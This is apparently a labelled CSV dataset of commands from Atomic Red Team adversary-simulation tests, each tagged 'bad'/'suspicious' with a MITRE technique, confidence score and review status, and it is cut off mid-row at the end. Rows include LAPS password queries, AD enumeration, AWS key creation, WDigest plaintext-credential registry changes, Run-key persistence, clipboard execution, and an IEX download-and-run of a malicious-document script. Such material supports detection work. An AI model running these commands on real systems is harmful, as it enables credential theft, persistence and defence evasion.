ms-mcs-AdmPwdExpirationTime,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4165f99952cbe67aa213079e,"Get-adcomputer -SearchScope subtree -filter ""name -like '*'"" -Properties *","Get-adcomputer -SearchScope subtree -filter ""name -like '*'"" -Properties *",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,T1087.002,"[""T1087.002""]",windows,0.9,False,This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a53f10294b846853fea06d44,"& ""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -h #{domain} -s subtree -f ""objectclass=computer"" *","& ""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -h #{domain} -s subtree -f ""objectclass=computer"" *",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Suspicious LAPS Attributes Query with adfind all properties,T1087.002,"[""T1087.002""]",windows,0.9,False,This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 202aa66e4de68d3016867f72,"& ""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -h #{domain} -s subtree -f ""objectclass=computer"" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime","& ""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -h #{domain} -s subtree -f ""objectclass=computer"" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,T1087.002,"[""T1087.002""]",windows,0.9,False,This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 73815a1a1b7178952bf62f45,"ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b ""CN=Users,DC=#{domain},DC=#{top_level_domain}"" -s sub -a always -z 1000 dn","ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b ""CN=Users,DC=#{domain},DC=#{top_level_domain}"" -s sub -a always -z 1000 dn",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Active Directory Domain Search,T1087.002,"[""T1087.002""]",linux,0.9,False,"Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0fcd37fff9b5c516bd2767e3,ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087,ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Account Enumeration with LDAPDomainDump,T1087.002,"[""T1087.002""]",linux,0.9,False,"This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 39a956dffe5d0e12c8f1d523,rm -rf /tmp/T1087/ 2>/dev/null,rm -rf /tmp/T1087/ 2>/dev/null,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Account Enumeration with LDAPDomainDump,T1087.002,"[""T1087.002""]",linux,0.55,True,"This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 42408467d87ba690eeee05da,"aws iam create-access-key --user-name #{username} > ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"" cd ""$PathToAtomicsFolder/T1098.001/bin/"" ./aws_secret.sh","aws iam create-access-key --user-name #{username} > ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"" cd ""$PathToAtomicsFolder/T1098.001/bin/"" ./aws_secret.sh",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1098.001/T1098.001.yaml,AWS - Create Access Key and Secret Key,T1098.001,"[""T1098.001""]",iaas:aws,0.9,False,"Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a964e8f64eb4fc92f0c58c9,"access_key=`cat ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"" | jq -r '.AccessKey.AccessKeyId'` aws iam delete-access-key --access-key-id $access_key --user-name #{username} rm ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds""","access_key=`cat ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"" | jq -r '.AccessKey.AccessKeyId'` aws iam delete-access-key --access-key-id $access_key --user-name #{username} rm ""$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1098.001/T1098.001.yaml,AWS - Create Access Key and Secret Key,T1098.001,"[""T1098.001""]",iaas:aws,0.55,True,"Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ff3d4d2c870cbcf6659ec4c,Start-Process #{powershell_command},Start-Process #{powershell_command},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1564.003/T1564.003.yaml,Hidden Window,T1564.003,"[""T1564.003""]",windows,0.9,False,"Launch PowerShell with the ""-WindowStyle Hidden"" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6fc7ad8ee5555e059d7bdcb7,"start """" #{browser} --headless --disable-gpu https://mockbin.org/bin/#{bin_id}","start """" #{browser} --headless --disable-gpu https://mockbin.org/bin/#{bin_id}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1564.003/T1564.003.yaml,Headless Browser Accessing Mockbin,T1564.003,"[""T1564.003""]",windows,0.9,False,"The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs. The default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view. Reference: https://cert.gov.ua/article/5702579 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 411987d5b8ee75dcb124866d,taskkill /im #{browser} /f,taskkill /im #{browser} /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1564.003/T1564.003.yaml,Headless Browser Accessing Mockbin,T1564.003,"[""T1564.003""]",windows,0.55,True,"The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs. The default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view. Reference: https://cert.gov.ua/article/5702579 ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3f26ef4bc9f91b5f06730e1b,conhost.exe --headless calc.exe,conhost.exe --headless calc.exe,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1564.003/T1564.003.yaml,Hidden Window-Conhost Execution,T1564.003,"[""T1564.003""]",windows,0.9,False,"Launch conhost.exe in ""headless"" mode, it means that no visible window will pop up on the victim's machine. This could be a sign of ""conhost"" usage as a LOLBIN or potential process injection activity. conhost.exe can be used as proxy the execution of arbitrary commands ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b8f2ce58d6f655e9b269c75c,Stop-Process -Name calc*,Stop-Process -Name calc*,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1564.003/T1564.003.yaml,Hidden Window-Conhost Execution,T1564.003,"[""T1564.003""]",windows,0.55,True,"Launch conhost.exe in ""headless"" mode, it means that no visible window will pop up on the victim's machine. This could be a sign of ""conhost"" usage as a LOLBIN or potential process injection activity. conhost.exe can be used as proxy the execution of arbitrary commands ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 56ba98c064c96f4d1e5c1b24,"dir | clip echo ""T1115"" > %temp%\T1115.txt clip < %temp%\T1115.txt","dir | clip echo ""T1115"" > %temp%\T1115.txt clip < %temp%\T1115.txt",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Utilize Clipboard to store or execute commands from,T1115,"[""T1115""]",windows,0.9,False,"Add data to clipboard to copy off or execute commands from. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 99ee7f4bd2b945f9dcdec3b9,del %temp%\T1115.txt >nul 2>&1,del %temp%\T1115.txt >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Utilize Clipboard to store or execute commands from,T1115,"[""T1115""]",windows,0.55,True,"Add data to clipboard to copy off or execute commands from. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eb23d304ee084ab7651fbd10,echo Get-Process | clip Get-Clipboard | iex,echo Get-Process | clip Get-Clipboard | iex,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Execute Commands from Clipboard using PowerShell,T1115,"[""T1115""]",windows,0.9,False,"Utilize PowerShell to echo a command to clipboard and execute it ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2020e1b2cf0a4cc5d4ef7d41,echo ifconfig | pbcopy $(pbpaste),echo ifconfig | pbcopy $(pbpaste),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Execute commands from clipboard,T1115,"[""T1115""]",macos,0.9,False,Echo a command to clipboard and execute it,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7634cafe27615e5f4898b464,"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value ""Atomic T1115 Test, grab data from clipboard via VBA"" IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1"" -UseBasicParsing) Invoke-Maldoc -macroFile ""PathToAtomicsFolder\T1115\src\T1115-macrocode.txt"" -officeProduct ""Word"" -sub ""GetClipboard""","[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value ""Atomic T1115 Test, grab data from clipboard via VBA"" IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1"" -UseBasicParsing) Invoke-Maldoc -macroFile ""PathToAtomicsFolder\T1115\src\T1115-macrocode.txt"" -officeProduct ""Word"" -sub ""GetClipboard""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Collect Clipboard Data via VBA,T1115,"[""T1115""]",windows,0.9,False,"This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b271d84ea0e50350198b0a9e,"Remove-Item ""$env:TEMP\atomic_T1115_clipboard_data.txt"" -ErrorAction Ignore","Remove-Item ""$env:TEMP\atomic_T1115_clipboard_data.txt"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Collect Clipboard Data via VBA,T1115,"[""T1115""]",windows,0.55,True,"This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 158ff707ffa025270819c4d5,apt install xclip -y history | tail -n 30 | xclip -sel clip xclip -o > history.txt,apt install xclip -y history | tail -n 30 | xclip -sel clip xclip -o > history.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1115/T1115.yaml,Add or copy content to clipboard with xClip,T1115,"[""T1115""]",linux,0.9,False,"Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d11a9705873d500d31c6a399,reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f,reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify Registry of Current User Profile - cmd,T1112,"[""T1112""]",windows,0.9,False,"Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7d981fa368886c2edf1cee3d,reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1,reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify Registry of Current User Profile - cmd,T1112,"[""T1112""]",windows,0.55,True,"Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a23eb97e5c44412e269001c2,reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f,reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify Registry of Local Machine - cmd,T1112,"[""T1112""]",windows,0.9,False,"Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 336cd1477fdb2585701602c9,reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1,reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify Registry of Local Machine - cmd,T1112,"[""T1112""]",windows,0.55,True,"Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2cffd865db257b10c39efd7a,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify registry to store logon credentials,T1112,"[""T1112""]",windows,0.9,False,"Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 82b3505a4a4afa692d81aece,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Modify registry to store logon credentials,T1112,"[""T1112""]",windows,0.55,True,"Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message ""The operation completed successfully."" will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c11f19294c23381b524d9c97,Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '1' -ErrorAction Ignore,Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '1' -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Use Powershell to Modify registry to store logon credentials,T1112,"[""T1112""]",windows,0.9,False,"Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 48f2ff0b0bff85cc0cf7bdee,Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '0' -ErrorAction Ignore,Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '0' -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Use Powershell to Modify registry to store logon credentials,T1112,"[""T1112""]",windows,0.55,True,"Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9a976475abce5c46a1968a84,"$key= ""HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"" $name =""bad-subdomain"" new-item $key -Name $name -Force new-itemproperty $key$name -Name https -Value 2 -Type DWORD; new-itemproperty $key$name -Name http -Value 2 -Type DWORD; new-itemproperty $key$name -Name * -Value 2 -Type DWORD;","$key= ""HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"" $name =""bad-subdomain"" new-item $key -Name $name -Force new-itemproperty $key$name -Name https -Value 2 -Type DWORD; new-itemproperty $key$name -Name http -Value 2 -Type DWORD; new-itemproperty $key$name -Name * -Value 2 -Type DWORD;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Add domain to Trusted sites Zone,T1112,"[""T1112""]",windows,0.9,False,"Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a3ef6c75155d5a6757a37f2f,"$key = ""HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"" Remove-item $key -Recurse -ErrorAction Ignore","$key = ""HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"" Remove-item $key -Recurse -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1112/T1112.yaml,Add domain to Trusted sites Zone,T1112,"[""T1112""]",windows,0.55,True,"Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 65fc7a5fff15bf36eda26fcc,"New-ItemProperty ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"" -Name T1112 -Value ""